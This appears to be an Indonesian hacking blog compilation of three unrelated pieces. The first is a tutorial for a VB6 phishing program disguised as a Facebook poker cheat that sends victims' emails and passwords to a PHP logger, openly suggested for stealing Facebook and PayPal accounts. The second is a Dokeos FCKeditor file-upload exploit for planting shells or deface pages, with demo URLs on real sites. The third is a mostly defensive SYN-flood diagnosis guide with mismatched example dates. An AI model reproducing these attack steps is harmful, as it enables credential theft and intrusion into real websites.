mungkin teman-teman sekalian udah tahu apa itu phishing ? kali ini teknik phishing-nya kita Lakukan pada sebuah program desktop:D ( biasanya kan Lewat situs Hotsting :3 )
sebelumnya baca dulu nih Kawan sebagai contoh-nya :
ada sebuah program kita sebut saja cheat poker facebook program itu akan menyuruh anda untuk login ke facebook menggunakan program tersebut,apabila ingin membuat cheatnya bekerja. user yang tertipu akan login lewat program tersebut di dalam program tersebut terdapat 2 buah textbox dan 1 buah command button.
2 textbox itu adalah penampung Email & Password yang akan di kirim ke server kita dan command buttonnya di gunakan untuk meng eksekusi code,setelah code di eksekusi program akan memanggil sebuah file .php yang telah di buat sebelumnya di server kita file php yang telah di panggil tersebut bertindak mencatat ip korban pengirim,mencacat tanggal pemanggilan file php,dan mencatat Email & Password korban yang telah di masukan di 2 buah textbox yang ada di program tersebut lalu menyimpannya dalam sebuah file text.
Bahan-Bahan yang harus Sobat punya untuk membuat project ini bekerja dengan lancar :
* 1 buah web hosting untuk menampung file php dan file text hasil dari phising kita * Program VB6 (Kalau bisa yang full version )
Buka webhosting sobat,lalu buat 1 buah file dengan nama r14nul.php lalu isikan dengan code ini
Terus Di Save, sekarang kita buka Microsoft Visual Basic 6.0
buat 1 buah project baru lalu buat ini :
* Buat 1 Form dengan nama frmUtama * buat 1 Module dengan nama modConnect
isi code ini kedalam module (modConnect)
Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Declare Function InternetGetConnectedState Lib "wininet.dll" (ByRef _ lpSFlags As Long, ByVal dwReserved As Long) As Long Const INTERNET_CONNECTION_MODEM = 1 Const INTERNET_CONNECTION_LAN = 2 Const INTERNET_CONNECTION_PROXY = 4 Const INTERNET_CONNECTION_MODEM_BUSY = 8
'Fungsi yang berguna untuk mengecek koneksi internet yang ada di komputer kita menggunakan fungsi api InternetGetConnectedState Function CekInternet(Optional connectMode As Integer) As Boolean Dim flags As Long CekInternet = InternetGetConnectedState(flags, 0) connectMode = flags End Function
lalu di frmUtama tambahkan 2 buah text box dan 1 buah command button 1 buah label
Textbox pertama di namakan : txtUname Textbox Kedua di namakan : txtPass Command button dinamakan : cmdLogin Label dinamakan : lblInfo
Copykan kode ini kedalam form :
Private Sub Form_Load() lblInfo.Caption = "Memeriksa Koneksi Internet" If CekInternet = False Then lblInfo.Caption = "Komputer Anda Tidak Terkoneksi Ke Internet !" Else lblInfo.Caption = "Komputer Anda Terkoneksi Dengan Internet" Me.Caption = "rianul cakep ;)" End If End Sub
lalu masukan code ini kedalam cmdLogin :
Dim user, pass As String Dim IE As Object user = LCase(txtUname.Text) pass = txtPass.Text
If txtUname.Text = "" Then MsgBox "Kotak Teks masih kosong,silahkan isikan dengan benar !", vbExclamation, "Error" Else lblInfo.Caption = "Sedang Login ..." Set IE = CreateObject("InternetExplorer.Application")
program ini bisa Sobat pake untuk apa aja,untuk Mencuri akun facebook,paypal,dll tergantung kreativitas Sobat aja dalam design programnya agar usernya tertarik & percaya kalau program ini aman :)
Portail Dokeos adalah semacam FCK editor remote file upload di vulnerability ini hacker bisa mengupload shell ataupun halaman deface , teman-teman dapat mengupload dan melihat halaman defaceatau file yang akan di upload padawebsite tanpausername dan password admin . Oke Langsung aja ke tutorialnya ..
Nah, Setelah Teman-Teman Menemukan Situs yang vulnerability dari om Google ,lakukanlah langkah-langkah berikut :
pergi ke : http://taget teman/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Ganti ASP ke PHP kemudian > klik browse > kemudian pilih file yang ingin teman upload > kemudian klik upload. Teman-Teman Bisa mengupload File Yang Berkstensi : PHP,HTML,JPG, Dan TXT
Untuk melihat Hasil File yang sudah di upload pergi ke : http://website/patch/main/upload/file sobat
Demo :
Live Demo : http://www.blowupwebshow.com/staff/main/inc/lib/fckeditor/editor/filemanager/upload/test.html Hasil : http://www.blowupwebshow.com/staff/main/upload/r14nul.html
Live Demo : http://www.rottapro.net/main/inc/lib/fckeditor/editor/filemanager/upload/test.html Hasil : http://www.rottapro.net/main/upload/r14nul.html
Live Demo : http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html Hasil : http://www.dokeos.nrc-gauthey.fr/main/upload/r14nul.html
Dalam serangan terdistribusi, komputer sering menyerang komputer pribadi dengan koneksi broadband ke Internet yang telah dikompromikan oleh virus atau program Trojan horse. Ini memungkinkan pelaku untuk kontrol jarak jauh mesin untuk langsung menyerang, dan seperti sebuah array dari komputer disebut botnet. Dengan budak seperti slave atau zombie host, layanan bahkan situs terbesar dan paling baik yang terhubung dapat terganggu. Distributed denial-of-service
Sebuah serangan denial-of-service (juga, Serangan DoS) merupakan serangan terhadap sistem komputer atau jaringan yang menyebabkan hilangnya layanan kepada pengguna, biasanya hilangnya konektivitas jaringan dan layanan dengan mengkonsumsi bandwidth jaringan korban atau overloading komputasi sumber daya dari sistem korban. Serangan dapat diarahkan pada setiap perangkat jaringan, termasuk router dan Web, surat elektronik, dan server Domain Name System.
Serangan DoS dapat dilakukan dalam beberapa cara. Ada empat jenis dasar serangan:
1) konsumsi atau overload sumber daya sistem atau jaringan, seperti bandwidth, disk space, atau waktu CPU
2) gangguan informasi konfigurasi, seperti informasi routing
3) gangguan komponen jaringan fisik
4) gangguan sistem operasi yang normal fungsi dengan memanfaatkan kerentanan perangkat lunak.
Upaya untuk "Flood" jaringan dengan paket palsu, sehingga mencegah lalu lintas jaringan yang sah, adalah bentuk paling umum dari serangan, sering dilakukan dengan mengganggu konektivitas jaringan dengan menggunakan beberapa host dalam serangan distributed denial-of-service atau DDoS. Serangan tersebut dapat mengkonsumsi sumber daya sistem intervensi dan jaringan di mana serangan itu ditransmisikan. Selain paket tidak benar dibentuk atau lalu lintas acak, dua cara canggih khusus serangan meliputi:
1) serangan smurf, di mana permintaan ICMP dikirim ke alamat broadcast jaringan terkonfigurasi, faked atau spoofed, source IP Address ke salah satu target.
2) SYN Flood, SYN palsu di mana permintaan untuk layanan (HTTP sering) menyebabkan server menjadi overload dengan half-open koneksi
Anda dapat memeriksa penggunaan http saat ini dengan menembakkan perintah shell
top-d2
Jika Anda mendapatkan banyak proses httpd, maka Anda harus memeriksa apakah itu adalah serangan DoS dan server adalah dengan paket SYN Flood. Anda dapat memeriksa ini dengan perintah berikut.
netstat -nap | grep SYN | wc -l
Jika Anda mendapatkan nomor abnormal kemudian server Anda sedang diserang.
Anda dapat memeriksa dari mana IP SYN paket yang datang. Berikan perintah berikut
netstat -nap | less
Anda akan mendapatkan semua rincian tabel routing dari kernel yang juga IP dari mana paket datang. Jika datang dari IP tertentu maka bahwa Anda hanya dapat memblokir IP pada server. Atau jika dari satu jaringan maka Anda akan memiliki untuk memblokir kisaran IP. Jika ada beberapa IP yang menyerang maka Anda harus menemukan situs yang sedang diserang.
Untuk memeriksa ini, cek :
/usr/local/apache/domlogs/
Periksa bagaimana Stat tanggal yang didefinisikan. Kemudian jalankan perintah "date". Periksa waktu saat ini dari server. Kemudian Anda harus memeriksa situs yang diserang sebelum menit yang lalu. Misalkan waktu saat ini 21 Januari 2012 9:32:27 kemudian jalankan perintah
grep "27/Maret/2012:09:32" *
Ini akan menampilkan daftar situs diakses pada waktu itu. Jika Anda melihat situs tertentu sedang diakses beberapa kali, maka situs tersebut diserang. Anda dapat mengganti waktu untuk memeriksa apakah situs yang berbeda berada di bawah serangan. Anda dapat menangguhkan situs yang untuk mencegah server dari overloading.
Banyak kali serangan hits IP tertentu dan semua situs yang memiliki bahwa IP bisa menyerang. Yang harus Anda lakukan adalah mengubah IP dari situs tersebut dan kemudian nol-rute IP itu.